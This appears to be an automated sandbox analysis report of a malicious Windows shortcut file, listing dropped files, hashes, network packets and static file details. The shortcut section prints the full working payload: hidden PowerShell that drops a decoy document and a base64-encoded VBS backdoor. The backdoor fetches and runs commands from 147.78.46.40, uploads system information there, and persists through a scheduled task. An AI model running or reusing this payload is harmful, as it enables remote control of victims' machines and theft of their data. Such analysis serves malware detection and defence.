                                                Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):22
                                                Entropy (8bit):2.6424239617719745
                                                Encrypted:false
                                                SSDEEP:3:QA6kLlAX:QAU
                                                MD5:67B76DED2BAAFB19AF81ACCF3E85282C
                                                SHA1:937AD3A872978BB13F2B81BBE66DC005C267992A
                                                SHA-256:97D64040E4513A4EA84262C024A1CF30D84D536D2180EA503C1E0580328C6798
                                                SHA-512:6D2392F8F646FA8F127F0A7124FA8FA13BEF50613C982FD69C1DA47EB9C61D83F2607633F1184EA289C795C7D69F72DF755E02316CFDFC2F00B2B6BFF97BE6C3
                                                Malicious:false
                                                Preview:..e.n.g.i.n.e.e.r.....

                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\793b56729a1d5792.customDestinations-ms (copy)

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5379
                                                Entropy (8bit):3.458487784463508
                                                Encrypted:false
                                                SSDEEP:48:99uHoyRjPx8dE8A7Ys2mYlHJbSogZozbYs2mYlLbSogZo/1:99uIyAVOY7piHkY7pUH0
                                                MD5:06B64199366E61A21135DCDAD0B7FCB2
                                                SHA1:BD60A490C696DBB63602B0BC0656C26FD625DABD
                                                SHA-256:95C381BE49A3B2595963C5C1B69D3A70EF595CDDD482CC0AFAC6898B538A6E26
                                                SHA-512:FDCF66BEDB8232903481976912ADC1DDEA7ABE004EFF3CA5AAA08DA354AFEB31EA49CF0519CD70C6911505F4137808BB7582C21EB3DA83CE773504AE53ECDBBE
                                                Malicious:false
                                                Preview:...................................FL..................F.`.. ....KB.W...I...=....S.=....S...........................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S.......W...I...=.....j.2..S..>Y.k .XA5HQD~1.LNK..N......EW.5>Y.k...........................h..X.A.5.h.Q.d.l.K.V.d...l.n.k.......W...............-.......V............lC<.....C:\Users\user\Desktop\XA5hQdlKVd.lnk..3.C.:.\.p.r.o.g.r.a.m. .f.i.l.e.s.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e.........%ProgramFiles%\windows nt\accessories\wordpad.exe...................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e................................................................................................................................................

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OYX5ZFQW5EYOI2ETHRZA.temp

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):12
                                                Entropy (8bit):0.41381685030363374
                                                Encrypted:false
                                                SSDEEP:3:/l:
                                                MD5:E4A1661C2C886EBB688DEC494532431C
                                                SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                Malicious:false
                                                Preview:............

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PV1QXCJX256AUXDA1XGY.temp

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5379
                                                Entropy (8bit):3.458487784463508
                                                Encrypted:false
                                                SSDEEP:48:99uHoyRjPx8dE8A7Ys2mYlHJbSogZozbYs2mYlLbSogZo/1:99uIyAVOY7piHkY7pUH0
                                                MD5:06B64199366E61A21135DCDAD0B7FCB2
                                                SHA1:BD60A490C696DBB63602B0BC0656C26FD625DABD
                                                SHA-256:95C381BE49A3B2595963C5C1B69D3A70EF595CDDD482CC0AFAC6898B538A6E26
                                                SHA-512:FDCF66BEDB8232903481976912ADC1DDEA7ABE004EFF3CA5AAA08DA354AFEB31EA49CF0519CD70C6911505F4137808BB7582C21EB3DA83CE773504AE53ECDBBE
                                                Malicious:false
                                                Preview:...................................FL..................F.`.. ....KB.W...I...=....S.=....S...........................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S.......W...I...=.....j.2..S..>Y.k .XA5HQD~1.LNK..N......EW.5>Y.k...........................h..X.A.5.h.Q.d.l.K.V.d...l.n.k.......W...............-.......V............lC<.....C:\Users\user\Desktop\XA5hQdlKVd.lnk..3.C.:.\.p.r.o.g.r.a.m. .f.i.l.e.s.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e.........%ProgramFiles%\windows nt\accessories\wordpad.exe...................................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.w.i.n.d.o.w.s. .n.t.\.a.c.c.e.s.s.o.r.i.e.s.\.w.o.r.d.p.a.d...e.x.e................................................................................................................................................

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):12
                                                Entropy (8bit):0.41381685030363374
                                                Encrypted:false
                                                SSDEEP:3:/l:
                                                MD5:E4A1661C2C886EBB688DEC494532431C
                                                SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                Malicious:false
                                                Preview:............

                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):55
                                                Entropy (8bit):4.306461250274409
                                                Encrypted:false
                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                Malicious:false
                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                Static File Info

                                                General

                                                File type:MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Fri Aug 4 04:10:09 2023, mtime=Fri Aug 4 04:10:09 2023, atime=Fri Aug 4 04:10:09 2023, length=0, window=hide
                                                Entropy (8bit):6.046375755549102
                                                TrID:
                                                • Windows Shortcut (20020/1) 100.00%
                                                File name:XA5hQdlKVd.lnk
                                                File size:10'562 bytes
                                                MD5:4e37f3bbf59b456fb07dc71f3fc20dba
                                                SHA1:816ade8789655d00cc33d290a7d8f8c3321f80c0
                                                SHA256:0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d
                                                SHA512:646d1dcf0ba983cd179eb29b2ce4060dbe68e4a8d6b1cbb5f53adcfcfbf796d6c76139c320d51b2c2b7764ad50498aea5e911d467b3eb5149d7b7cae39c718dd
                                                SSDEEP:192:8iIJudXs1THeATd4shAXDDlL3Gvn2yDctJZ+7BJkY3820pLkz:oJ31rek44AX1L2vDDci3MRpL0
                                                TLSH:13228EF87874294DDA210CBE198F4B411E7E2C33D965A18D4DC9814BA8D931D77BB760
                                                File Content Preview:L..................Fe........Ng......Ng......Ng..................................P.O. .:i.....+00.../C:\.....................2..:..HG.%..windows\system32\WindowsPowershell\v1.0\powershell.exe..........HG.%.KMA....w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.

                                                File Icon

                                                Icon Hash:dce4d4c4ccc9c96d

                                                Static Windows Shortcut Info

                                                General

                                                Relative Path:
                                                Command Line Argument:-w hidden -nop -noni -exec bypass -c $temp='UEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAALAAAAX3JlbHMvLnJlbHOtkk1LA0EMhu/9FUPu3WwriMjO9iJCbyL1B4SZ7O7Qzgczaa3/3kEKulCKoMe8efPwHNJtzv6gTpyLi0HDqmlBcTDRujBqeNs9Lx9g0y+6Vz6Q1EqZXCqq3oSiYRJJj4jFTOypNDFxqJshZk9SxzxiIrOnkXHdtveYfzKgnzHV1mrIW7sCtftI/Dc2ehayJIQmZl6mXK+zOC4VTnlk0WCjealx+Wo0lQx4XWj9e6E4DM7wUzRHz0GuefFZOFi2t5UopVtGd/9pNG98y7zHbNFe4ovNosPZG/SfUEsHCOjQASPZAAAAPQIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAGRvY1Byb3BzL2NvcmUueG1sbVJbS8MwFH73V5S8t+kFZZS2A5U9ORA2UXyLyVkXbdKQnK3bvzdtt7rhoA/nu/Q7OScp5gfVBHuwTra6JEkUkwA0b4XUdUne1otwRgKHTAvWtBpKcgRH5tVdwU3OWwuvtjVgUYILfJB2OTcl2SKanFLHt6CYi7xDe3HTWsXQQ1tTw/gPq4GmcfxAFSATDBntA0MzJZJTpOBTpNnZZggQnEIDCjQ6mkQJ/fMiWOVu/jAoF04l8WjgpvUsTu6Dk5Ox67qoywarP39CP5Yvq2HUUOp+VRxIVQiecwsMW1sV9BL4WoDjVhr0Kx/FK8Ljhul65/dTgQ7fVoNlovrNN8zh0t/RRoJ4PPqMG9xpE7k6cYEfIR8HPkvv2dPzekGqNE6zMJ6FcbZOs/x+5r/Pvul1wNDZwl72T6VKhqYT7E/tdl/fwHEcaQK+RokNjPS5/Pd8ql9QSwcI1kKz4VIBAACKAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAQAAAAZG9jUHJvcHMvYXBwLnhtbJ1R0W6DIBR931cYs9eKUrW2oTTLlj01WZO5dm8N4lVZFAjQpv37sTZzPg9e7rnncA5wyeYy9MEZjBVKrsMkisMAJFe1kO06/ChfZ0UYWMdkzXolYR1ewYYb+kB2RmkwToANvIO067BzTq8QsryDgdnI09IzjTIDcx6aFqmmERxeFD8NIB3CcZwjuDiQNdQzPRqGd8fV2f3XtFb85352X16196OkhEH3zAEl6K8slWN9KQagsW+PgDxp3QvOnP8RuhWVgbdbBFpEmd/4cSvk6XL8LPJjngYTwdE/4Qu4Q5wVDSxSnOIcF3HWYDyvlgzP52nFF0mRsKriVZMBQdOon9z9fRA0yaLYr5vgt0d2rAVLMUH3ghyUqS1NigVB95I8d8ww7vwBmuS5V04aE/IgXPeuGfcmyTJJp7IJ5fMMaw3TnaXpLXWEHozTot9QSwcILVvKq0sBAABDAgAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAAcAAAAd29yZC9fcmVscy9kb2N1bWVudC54bWwucmVsc62RTQrCMBCF954izN6mVRCRpm5EcCv1ADGdtsE2CckoensDiloo4sLl/H3vMS9fX/uOXdAHbY2ALEmBoVG20qYRcCi30yWsi0m+x05SXAmtdoHFGxMEtERuxXlQLfYyJNahiZPa+l5SLH3DnVQn2SCfpemC+08GFAMm21UC/K7KgJU3h7+wbV1rhRurzj0aGpHggW4dhkiUvkES8KiTyAE+Lj/7p3xtDZXy2OHbwav1zcT8rz9Aopjl5xeenaeFSc4H4RZ3UEsHCPkvMMDFAAAAEwIAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEQAAAHdvcmQvZG9jdW1lbnQueG1s7V1bb9tGFn7fXzHQQ7ELKBJ1sSyrlYtugnQDpEFQp+hjQFGUxF1S1JKUZffJjpqkBYI6yAYukL2kwS5291H2RrUSXwrsLxj+hf0le84MSV0sJbZkxyI1TiuSM3MOZ4bfmXPmduaTTzcMnayrlq2Z9WIslZBiRK0rZlmrV4uxr+7dvJaPEduR62VZN+tqMbap2rFPV3/1SatQNpWmodYdAhzqdsEsxppWvWArNdWQ7WuGplimbVaca4ppFMxKRVNU7xLzKKxirOY4jUIy6RElzIZah7iKaRmyA49WNclJbnjvSqYlKZe0VF12IL92TWvYPrf1d71/3dD9dK2zvLVlWuWGZSqqbUNFGDp/ryFr9YBNSjpDgZFPQNE4y5vLltwaeOVwRm7wyD5H+xTLIBsJyIZXe4wL8EtJI/zWanJD7XOrzsbtc8tsNnxuhnKW0hqy9YdmA2usAV+0pOmas8kK3s9UKjtbrkbrbDp+A/hJLZ2PQTpgYCiFW9W6acklHSQJckKweAQ4xlZBoEpmeROvDfZz12KXNWdTV0mrsC7rxdgdrDo9lmSptbLmh0s8yG7IChQVQnWtrn7ZxLeoG7LixLygYiydlfChpMJXUJEQHuSKo1oBE61extRqxfGiLa1a8+9rcr3KWgYv8e8VPwsKSKdq8VCL5926adYdG19gK5pWjN3TDNUmd9QW+dI05Drj91ndHh+jyrbzma3JYyMV+3QwrxT2q5i6afkZk5uOOVo9Q5X2jR+QznshNayBiqb71EEZdVVmRUx6ZUwG38kaV+5zl2GauppUbon9XVbJWwVnlb5y2/Q1PaH7tEPoL3jj7rrb7gP6lgW4W/SEQGQPng/xl2BqAimAzG0jL4dz5DUpsC+wHxrs7wOOGcQ7iHriPgKAww09dJ/QY7i+iROIek2P4P6YiwUmBuGAdEEKT0bekZB2if8aEDAQMnfLbbvf0S5EHbs7ccLIvkN+QqAuVqC0gd9pxSobWrEaU+5zidW5S47g/TVDOAgA4HnPB/8uSMdbEIEuSBzoEZSM3wisXyzWFw/fHxDZAqUCpfOPUmbWPGeWR4dZ6tDotukRWhrQIrdJJpWQhprdRauc5UUuPY5+MM7QrDQs1VatdTW2mkhL6QyhrwITtUPOV0lratVUyVe3yNqmUTJ1v5LGBHuVNCbGq6TRmKuAyP++3RUgGQUJWcqnk9nsUiYp5aNjtyGB0IcRxvMwRp2S7l08rJf0r4G0VYytZLJZ5OJsNgBg5Q15MlKA6BZDG5Atj6GB+Nvyptl0gqiKtqGWg8jrqq5/IfP3mw3ORxrDB984ObZkOo5pTI5n+J8UnRzOSHK4Sj63tDLeVuF63dQ5k2xuOc05jwan+hx9Soez8lsU63eqlxtWlSmGDy7osnMbceez8CkU/us/fT2QhzEVrvzWtMqqZferlL0HJw50FQnsb4qxHLvhzRqrEYbCYfx5VT4ldfBJpqS3BivpvOTJkXrgIjKcLJCZm+xvrNT4lX625ryllc3WdWhALAYIFl+RdVu9wNY+JQ229ylJtPiixZ/GgqH/YObtMfSIdum+u+0+oW9pj74hLPgNdJWO4R8LYJMbhB4l6J8h1b43OzKD2SPkRMjJ/MnJ6v0z/S0U7sM9RiYtIPLPXWY+R3HMGn0+MtbG9p3PxQUz27PMToQP9qK5DxfoL7G5X9CGX0hA9CVgQsdgYHUT7bjPCX0Gl23i7tC3BUIP4GGHreLA1U9CJoRMREomRCdA4H4hcY89AJLKFCSJ0P/QE/o6QaSVhJTn06HuVkJAXkA+WpAXTb3A/SLi3m0PL/T2l2yfsIb/kJ7012IT91t3F2z+nvsYAk7cHyEV0J7QPdrj+yOOaBeokegHISlCUqIlKUJDCNwvIu7pX9iunUegBg6wY+A+xB4B/bmvFrxpgYLAvsB+pLA/YVD0KEH46gdcLREncG3TQwj7ExOJLrOlDnGR+b8gAu2pHi6toL04ya3ExTCpkJJoSYmwjATuFxH3E7QD9xrw2t0pgEYArfAS/v83aIZ96DZ3mSI4ETpAyEK0ZCGKOgAjZ8H9mPVy54Nh+EA366b6KRes8T30v9Ceu+05jNh1H8EVzfAed0PBRi73IcX3tDtu/Vqyv7WC/57eYME2Z4gNFmKDhVCEYWqTPvRw2QucCHHbBM0/dJgTGH30WYI+TZB0PpFKJVIruTzOpNNjMZkuZCBiMnA2YzCkZqGQACEBM0+aJAk6ROMpvDl3iOz1N1uIyRQhE9GSiYnDZQ/YDMkbb9tpJ07yeRLvT7CQ+PKKlM6JMTMhENESiGibSbOOngkJWAAJoM+ZWdRhPpXRlcCJZwy526ASjthjkKJH0HUb+ig45b6N9sJlL124cER9YPmD4rJkJSdcxowYJ7lPn2TgQumKvH2J9lbgej69tAq7QOBU+KX78H7pWAUFpJfsgG7C1xDzo8nFmR+9hAUToTtnJLxN/Jhyf4AO4F/RnwQ95Icg4D6yY+jR8TXTe27bfQD/dpijiaGTdnCK9SIO2pnXgcGKZtnObcZtaXlJ9P7mYaD6bEjFnfMcmGw8o8udpGwzKt+PFg5v4AEgceZHBYcz9nDXAGPyhMDlMSPhD0PbM3EtE9tg0AV2e5CKLSnF83nwWKoOzwQ9gtyl05k4ySynCf0nfUlfEPp3dsZIx/0RvbXExxBIS0CQyhD6gj6lr0YI2NDLGKJcPk5S+aVrmbOc9eNvL51w1k9i3BC/6GWL3kuY2g/RexG9F9F7CWPvJQpTtqLvcuVm4nMwEXdwT+gWM+T8TdLsQEXWX9ldrJUMolO/aIKxSn8C8/6A78fAFT1zjvdBtJ+zc76cys6jGlg8nM9F0/9y8Iho6Lm/94hob7hglx59JDdM+2PUE8/wqFtvLRw/XMEfDmBuBDqEPk1llnIB8wOfFNIe9tUNvmbssQ7MsdPwwQ5eUJCpYOmdT8JcPdE9dGrA+vQhU2HRGJe+iON6wzsEeEU7C4UrfKHbrhr6c6Hb+h5h3Yd0f8QfLF+MR/h4dqjdgovxXSEhU0oILlPFqZmfcX6DfPTHpul8fP/+fX5DTi3mJmkJf33hKYRLToQmEXLyXvMplSD0b76HWNaDOTktB5Hb+BAF0VjsvsY8qJP//kSC/979NyQcV153V+8BhvQ1Me+y4fhJuPppwgoVzcZ0zUYaVK43A9VfKOQPWoRKBqKgRoUMXPZM0ysAOC5T67KFaVvTmZfCvgyjfRleIZnVRro4dfEe0zL65uZUrc6wuRku0zIKrcfitRhz7pgiOspVbMyPRn8fF1UcsJkoz/9WsBKPHjGfEu4226nQww0Le2yRBuN4PHTgFV9FAemYhbnNdjJ04gTZM08U6LSLeB2snvvwtFsKSOx+73mxAHr2Dvex23Z/YLs7/POzRueRQ/9VZ3S6IDaACP0ZVv05jZ6bDqWZ3EzLGCdjtGQ6tbBiNL+AGJ2mzAKjIcfo+G9pq4rjWUmbjeA71tUN565c9czmRnUN89IC2zftaboa3C/lfdXWqH4hW8FHSWWzg9/Ff6w2He8zIr0ql4MHx2z0k1VMs5+M72PyIr1X3Wka93hWKwawL6uKFmAOQGPctcxg69KA7e9AkW5oFhRXM+uBcrXulXh02VRwyxgJtnSpFbmpB8C8qzlKLbD9lZpsrfGhkay0kvNq3q/KJOa7vMlugG3TUOvO6v8BUEsHCHI9Q4LUCgAAWKwAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAADwAAAHdvcmQvc3R5bGVzLnhtbMVU207bQBB971dY+x4cUERRhEGQKiISSqtyeZ/Y43jF3rq7JoSv7+7GayWxETRU7Uu8czYzPnPOeM4vXzhLnlEbKkVGjo+GJEGRy4KKZUYe7qeDM5IYC6IAJgVmZI2GXF58OV+NjV0zNInLF2a8ykhlrRqnqckr5GCOpELh7kqpOVgX6mW6krpQWuZojCvPWXoyHJ6mHKggsczxqFOI01xLI0t7lEueyrKkOYZSLv14GE6cxQI8/wgRDvqpVgNXT4GlC8qoXQcyJOH5eLYUUsOCuW4dH3Lhei1k/g1LqJk1PtQ/dBM2UXhMpbAmWY3B5JRmZAKMLjQlDqmuhNlFEIy9MhQyck2tsRqBJ4+oIbkDYfwfcpORqUYMcerrP6EW7uIZWEZONpB5bYEWmZgWG20wBmIZMRSDh7tdAq/VYDL30IIWjmRFB7O5T0ybztL9ftV+FF5cK6WdsVe1lTdrVaFoeVhdY1NQNQW3S6QdecNkuWy7Vs4DBRqWGlTlOYarWZGRubeTBXMEcIzvauDQ969psDzdYrmihVxNnE9asphSAjO4yfAKRHi4TfmfmZxLJnWkAE7L/+59UPyjrtwg+M3RsSXiG5XBYPFd9Fkm8MVG/N6dr2WxftPMJ0Q130qIc+b4KMhpaHyB7rtHr8fQE4XSonZr7uRj7t7ShbPLutXYWta43HNzgNtbHp71eHj2GSta+fa98GDib991I37arZqMCvxZ+8UYRrNBHNOvp2RL7B2pR31SH9rULTW201AA+3rZnaCt3dNn+b47h1KcgPJj0WEZ8fdE7xn0uFtvndjzmrvJM2+MuR/sPxjz7kTSze/E7M/n6K0dc6hOM1HgS0elDfrXNPqM3fFkLn4DUEsHCNrTG9+NAgAAJQkAAFBLAwQUAAgICABdJwRXAAAAAAAAAAAAAAAAEgAAAHdvcmQvZm9udFRhYmxlLnhtbK2S22oCMRCG7/sUIfc1qxelLK4iLYVC8aLqA8zGWXcghyWTuvXtG1eF0i5F6t4lc/i/mT+Zzj+tEXsMTN4VcjzKpECn/ZbcrpCb9cv9oxQcwW3BeIeFPCDL+exu2uaVd5FFanect4WsY2xypVjXaIFHvkGXcpUPFmK6hp1qfdg2wWtkTurWqEmWPSgL5ORZJlwj46uKND57/WHRxZNIQAMxbcA1NSxn5+lEmzuwaeg1WWSxxFa8ewuuK9A1BMZjzR5MIbNMqq4PLJnDJRq68i7RUNT1Jb6HQFAaPKbUCfYLujrY0pte1mRo1iKV9KN61+KWmP+JeqMSQ2e2WGGgqqOCicuUvej89Fv1TTYe2oQnMFQG6rVhcNh3G8BxnwunR7l+91te5ZofPrgHK9x5FJtX8cdXvx16PvDsC1BLBwi9glXrOwEAAKwEAABQSwMEFAAICAgAXScEVwAAAAAAAAAAAAAAABEAAAB3b3JkL3NldHRpbmdzLnhtbGVQu27DMAzc+xWG9kZOhj6MOEGXoEM7Jf0ARqZjAZYoiHRc9+vLxA1aoBvJu+PxuN5+hr44Y2ZPsTbLRWkKjI4aH0+1+Tjs7p9MwQKxgZ4i1mZCNtvN3XqsGEWUxYVuiFyNtelEUmUtuw4D8IISRsVaygFE23yyI+UmZXLIrNLQ21VZPtgAPpqNrvwiCsVYJcwOo+g5ZWnsBWiwhaGXAxz3QkkpZ+hr81g+zzAMQq9T6jCCaI4bLnnAmeAoJJDfaj/frsQIQVPNU3/0vZfpnRo0Cg3Z/8sUvMvE1MpCJZba1ju8pjI30+XqYmn/eopqcUdR3uDqeeVdBAgsL+xh7o6+UcMf9e27m29QSwcIW/gKEQkBAACiAQAAUEsDBBQACAgIAF0nBFcAAAAAAAAAAAAAAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbL2Uy07DMBBF9/2KyFuUuLBACCXpgscSughrZOxJaogfst3S/j3jNKpQFZoChWU8c++ZuU6Sz9aqTVbgvDS6IOfZlCSguRFSNwV5qu7TKzIrJ3m1seAT7NW+IIsQ7DWlni9AMZ8ZCxortXGKBXx0DbWMv7EG6MV0ekm50QF0SEP0IGV+CzVbtiG5W+Pxlotyktxs+yKqIMzaVnIWsExjlQ7qHLT+gHClxd50aT9Zhsquxy+k9WdfE6xu9gBSxc3i+bDi1cKwpCug5hHjdlJAMmcuPDCFDfQ5bkKzE+8zRBKGz52xHq/FQXY4+AO8qE4tGoELEo4jovX3gaauJQf0WCqUZBCDFiCOZL8bJ/pwdxbY/h9Bd+jP0F/tHd1wZQ7e46eJG+wqikk9OocPmxb86afY+o7ia0RW7KX9wQs3NsHOejwDCAE1f5FC79yPMMlp978sPwBQSwcIC9URx1QBAABeBQAAUEsBAhQAFAAICAgAXScEV+jQASPZAAAAPQIAAAsAAAAAAAAAAAAAAAAAAAAAAF9yZWxzLy5yZWxzUEsBAhQAFAAICAgAXScEV9ZCs+FSAQAAigIAABEAAAAAAAAAAAAAAAAAEgEAAGRvY1Byb3BzL2NvcmUueG1sUEsBAhQAFAAICAgAXScEVy1byqtLAQAAQwIAABAAAAAAAAAAAAAAAAAAowIAAGRvY1Byb3BzL2FwcC54bWxQSwECFAAUAAgICABdJwRX+S8wwMUAAAATAgAAHAAAAAAAAAAAAAAAAAAsBAAAd29yZC9fcmVscy9kb2N1bWVudC54bWwucmVsc1BLAQIUABQACAgIAF0nBFdyPUOC1AoAAFisAAARAAAAAAAAAAAAAAAAADsFAAB3b3JkL2RvY3VtZW50LnhtbFBLAQIUABQACAgIAF0nBFfa0xvfjQIAACUJAAAPAAAAAAAAAAAAAAAAAE4QAAB3b3JkL3N0eWxlcy54bWxQSwECFAAUAAgICABdJwRXvYJV6zsBAACsBAAAEgAAAAAAAAAAAAAAAAAYEwAAd29yZC9mb250VGFibGUueG1sUEsBAhQAFAAICAgAXScEV1v4ChEJAQAAogEAABEAAAAAAAAAAAAAAAAAkxQAAHdvcmQvc2V0dGluZ3MueG1sUEsBAhQAFAAICAgAXScEVwvVEcdUAQAAXgUAABMAAAAAAAAAAAAAAAAA2xUAAFtDb250ZW50X1R5cGVzXS54bWxQSwUGAAAAAAkACQA8AgAAcBcAAAAA';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\Return.docx -value $fil -encoding byte;&$home\appdata\local\temp\Return.docx;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgJGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cDovLzE0Ny43OC40Ni40MDozNzY2Mi94c1NwUWJTT0dIeXpNTHhaL3BhZ2UxNjQvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskYmpkbys9SUVYICRqa3J8b3V0LXN0cmluZztbYnl0ZVtdXSRkcnB5PVtzeXN0ZW0udGV4dC5lbmNvZGluZ106OlV0ZjguR2V0Qnl0ZXMoJGJqZG8pO307JHVqaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JHVqay51cGxvYWRkYXRhKCdodHRwOi8vMTQ3Ljc4LjQ2LjQwOjQzODkxL3BhZ2UxNjQnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg0KDQo=';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;
                                                Icon location:C:\program files\windows nt\accessories\wordpad.exe

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 30, 2024 15:31:46.700943947 CEST4973537662192.168.2.6147.78.46.40
                                                Sep 30, 2024 15:31:46.705987930 CEST3766249735147.78.46.40192.168.2.6
                                                Sep 30, 2024 15:31:46.706110001 CEST4973537662192.168.2.6147.78.46.40
                                                Sep 30, 2024 15:31:46.706336975 CEST4973537662192.168.2.6147.78.46.40
                                                Sep 30, 2024 15:31:46.711143017 CEST3766249735147.78.46.40192.168.2.6
